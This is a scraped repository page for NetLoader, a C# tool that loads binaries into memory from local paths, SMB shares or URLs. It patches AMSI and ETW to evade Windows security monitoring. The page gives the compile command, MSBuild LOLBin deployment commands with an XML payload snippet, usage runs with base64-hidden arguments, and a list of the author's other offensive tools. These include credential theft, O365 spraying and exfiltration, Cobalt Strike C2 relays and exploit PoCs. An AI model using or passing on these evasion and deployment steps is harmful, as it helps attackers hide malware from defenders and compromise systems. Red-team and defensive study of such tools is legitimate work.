• Stars
    star
    656
  • Rank 68,675 (Top 2 %)
  • Language
    C#
  • Created over 4 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Loads any C# binary in mem, patching AMSI + ETW.

NetLoader

Loads any C# binary from filepath or url, patching AMSI and unhooks ETW

** 01.10.2021 : Non-Obfuscated source code + SharpSploit to 'bypass' userland hooks when patching AMSI and ETW**

Looking for binaries/payloads to deploy? Checkout SharpCollection!.
SharpCollection contains nightly builds of C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.

Compile

c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:RandomName.exe Program.cs

Deploy via LOLBin (MSBuild)

Payload for MSBuild is in the /LOLBins folder, might push this for varius other LOLBins aswell. Arguments have to be added into the bottom XML file when NetLoader is deployed using MSBuild

Adding arguments to the XML payload
    public class ClassExample : Task, ITask
    {
        public override bool Execute()
        {	//Add your arguments here 
            SoullikePrincelier.Main(new string[] { "--path", "\\smbshare\Seatbelt.exe" });
            return true;
        }
    }

For 64 bit:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe NetLoader.xml

For 32 bit:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe NetLoader.xml

Usage

Deploy payload from local path or SMB share (note that NetLoader automatically detects whether the path provided is local or remote)

PS C:\Users\Clark Kent\Desktop> .\NetLoader.exe --path Seatbelt.exe --args whoami
[!] ~Flangvik , ~Arno0x #NetLoader
[+] Successfully patched AMSI!
[+] URL/PATH : Seatbelt.exe
[+] Arguments : whoami


						%&&@@@&&
						&&&&&&&%%%,                       #&&@@@@@@%%%%%%###############%
						&%&   %&%%                        &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
%%%%%%%%%%%######%%%#%%####%  &%%**#                      @////(((&%%%%%%######################(((((((((((((((((((
#%#%%%%%%%#######%#%%#######  %&%,,,,,,,,,,,,,,,,         @////(((&%%%%%#%#####################(((((((((((((((((((
#%#%%%%%%#####%%#%#%%#######  %%%,,,,,,  ,,.   ,,         @////(((&%%%%%%%######################(#(((#(#((((((((((
#####%%%####################  &%%......  ...   ..         @////(((&%%%%%%%###############%######((#(#(####((((((((
#######%##########%#########  %%%......  ...   ..         @////(((&%%%%%#########################(#(#######((#####
###%##%%####################  &%%...............          @////(((&%%%%%%%%##############%#######(#########((#####
#####%######################  %%%..                       @////(((&%%%%%%%################
						&%&   %%%%%      Seatbelt         %////(((&%%%%%%%%#############*
						&%%&&&%%%%%        v1.0.0         ,(((&%%%%%%%%%%%%%%%%%,
						 #%%%%##,


ERROR: Error running command "whoami"


[*] Completed collection in 0,008 seconds

Supports base64 inputs for those long strings that would usually break stuff!

PS C:\Users\Clark Kent\Desktop> .\NetLoader.exe --b64 --path U2VhdGJlbHQuZXhl --args d2hvYW1p
[!] ~Flangvik , ~Arno0x #NetLoader
[+] All arguments are Base64 encoded, decoding them on the fly
[+] Successfully patched AMSI!
[+] URL/PATH : Seatbelt.exe
[+] Arguments : whoami


						%&&@@@&&
						&&&&&&&%%%,                       #&&@@@@@@%%%%%%###############%
						&%&   %&%%                        &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
%%%%%%%%%%%######%%%#%%####%  &%%**#                      @////(((&%%%%%%######################(((((((((((((((((((
#%#%%%%%%%#######%#%%#######  %&%,,,,,,,,,,,,,,,,         @////(((&%%%%%#%#####################(((((((((((((((((((
#%#%%%%%%#####%%#%#%%#######  %%%,,,,,,  ,,.   ,,         @////(((&%%%%%%%######################(#(((#(#((((((((((
#####%%%####################  &%%......  ...   ..         @////(((&%%%%%%%###############%######((#(#(####((((((((
#######%##########%#########  %%%......  ...   ..         @////(((&%%%%%#########################(#(#######((#####
###%##%%####################  &%%...............          @////(((&%%%%%%%%##############%#######(#########((#####
#####%######################  %%%..                       @////(((&%%%%%%%################
						&%&   %%%%%      Seatbelt         %////(((&%%%%%%%%#############*
						&%%&&&%%%%%        v1.0.0         ,(((&%%%%%%%%%%%%%%%%%,
						 #%%%%##,


ERROR: Error running command "whoami"


[*] Completed collection in 0,006 seconds

Todo

  • Automate the build and release of many of the Sharp Tools so they automagically appear in /Binaries SharpCollection (CDI / Azure DevOps)
  • Add support for non-interactive use (input args)
  • Add support to run custom modules from your own URL or SMB Share (Great for on-the-fly Implant deployment)
  • Add an working MSBuild XML payload for the LOLBins lovers (Myself included)
  • Update with credits and links to the github repos that /Binaries SharpCollection are compiled from

Credits

Arno0x for the partial rewrite that is now merged into the main repo see gist _RastaMouse for the AMSI bypass

More Repositories

1

SharpCollection

Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.
1,767
star
2

BetterSafetyKatz

Fork of SafetyKatz that dynamically fetches the latest pre-compiled release of Mimikatz directly from gentilkiwi GitHub repo, runtime patches signatures and uses SharpSploit DInvoke to PE-Load into memory.
C#
788
star
3

TeamFiltration

TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts
C#
764
star
4

SharpDllProxy

Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading
C#
523
star
5

AMSI.fail

C# Azure Function with an HTTP trigger that generates obfuscated PowerShell snippets that break or disable AMSI for the current process.
C#
309
star
6

SharpProxyLogon

C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode injection
C#
226
star
7

CobaltBus

Cobalt Strike External C2 Integration With Azure Servicebus, C2 traffic via Azure Servicebus
C#
208
star
8

AzureC2Relay

AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.
C#
195
star
9

DeployPrinterNightmare

C# tool for installing a shared network printer abusing the PrinterNightmare bug to allow other network machines easy privesc!
C#
177
star
10

RosFuscator

YouTube/Livestream project for obfuscating C# source code using Roslyn
C#
119
star
11

SharpExfiltrate

Modular C# framework to exfiltrate loot over secure and trusted channels.
C#
114
star
12

ObfuscatedSharpCollection

Attempt at Obfuscated version of SharpCollection
103
star
13

SharpAppLocker

C# port of the Get-AppLockerPolicy PS cmdlet
C#
97
star
14

DLLSideloader

PowerShell script to generate "proxy" counterparts to easily perform DLL Sideloading
C++
93
star
15

UAC-D-E-Rubber-Ducky

Python2 / BASH / VBS- UAC D&E Rubber Ducky
Python
59
star
16

HIDAAF

Python - Human Interface Device Android Attack Framework
Python
36
star
17

HTB-HDBadgeGenerator

HackTheBox High Definition Badge Generator
Python
21
star
18

collector

Utility to analyse, ingest and push out credentials from common data sources during an internal penetration test.
Python
18
star
19

CobaltStuff

12
star
20

AntminerController

C# - Allows for easy changing of pools across multiple miners.
C#
4
star
21

MimiFud

3
star
22

BlackBox-0.1

The baddest box on the frequency
2
star
23

QRucible

Suprise at x33fcon
2
star
24

ProCheat

Cheating on Pro E-Sport LAN events made easy
Visual Basic
1
star
25

StreamStuff

Contains stuff made during streams
C#
1
star